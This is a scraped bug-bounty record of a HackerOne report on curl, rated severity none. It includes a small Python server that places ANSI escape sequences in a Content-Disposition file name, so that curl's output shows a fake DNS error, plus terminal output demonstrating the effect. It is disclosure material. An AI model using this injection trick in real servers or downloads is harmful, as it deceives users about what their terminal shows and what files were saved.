{“lastseen”:”2025-12-11T08:25:46″,”description”:”## Summary:\\n\\nNo AI here, I just came across this:\\n\\n“`python\\nimport random\\nimport string\\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\\n\\nclass MaliciousHandler(BaseHTTPRequestHandler):\\n def do_GET(self):\\n self.send_response(200)\\n self.send_header(‘Content-Type’, ‘text\/plain’)\\n \\n rand_id = ”.join(random.choices(string.ascii_lowercase + string.digits, k=8))\\n fake_error = \\”curl: (6) Could not resolve host: google.com\\”\\n \\n malicious_filename = f\\”{rand_id}\\\\033[1G\\\\033[2K\\\\033[A\\\\033[2K\\\\033[A\\\\033[2K{fake_error}\\”\\n self.send_header(‘Content-Disposition’, f’attachment; filename=\\”{malicious_filename}\\”‘)\\n self.end_headers() \\n self.wfile.write(b\\”curl rocks\\”)\\n\\nif __name__ == ‘__main__’:\\n server_address = (”, 8080)\\n httpd = HTTPServer(server_address, MaliciousHandler)\\n httpd.serve_forever()\\n“`\\n\\n“`bash\\n\u276f curl -J -O -w \\”Saved to: %{filename_effective}\\\\n\\” http:\/\/localhost:8080\/somefile\\n % Total % Received % Xferd Average Speed Time Time Time Current\\ncurl: (6) Could not resolve host: google.com\\n“`\\n\\n“`bash\\n\u276f ls -al\\ntotal 16\\ndrwxr-xr-x 4 kelsier staff 128 10 Dec 01:57 .\\ndrwxr-xr-x 4 kelsier staff 128 10 Dec 01:07 ..\\n-rw-r–r– 1 kelsier staff 33 10 Dec 01:57 5152c4jl?[1G?[2K?[A?[2K?[A?[2Kcurl: (6) Could not resolve host: google.com\\n-rw-r–r– 1 kelsier staff 1550 10 Dec 01:57 salsa.py\\n“`\\n\\n“`bash\\n\u276f zsh –version\\nzsh 5.9 (arm64-apple-darwin24.0)\\n“`\\n\\n## Impact\\n\\n## Summary:\\n\\n\/me thinks this might be problematic?”,”published”:”2025-12-10T02:16:41″,”modified”:”2025-12-11T08:22:21″,”type”:”hackerone”,”title”:”curl: Terminal Output Not Great”,”source”:””,”references”:””,”id”:”H1:3460184″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3460184″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-11T08:25:46″,”description”:”## Summary:\\n\\nNo AI here, I just came across this:\\n\\n“`python\\nimport random\\nimport string\\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\\n\\nclass MaliciousHandler(BaseHTTPRequestHandler):\\n def do_GET(self):\\n self.send_response(200)\\n self.send_header(‘Content-Type’, ‘text\/plain’)\\n \\n rand_id = ”.join(random.choices(string.ascii_lowercase…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-30336","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n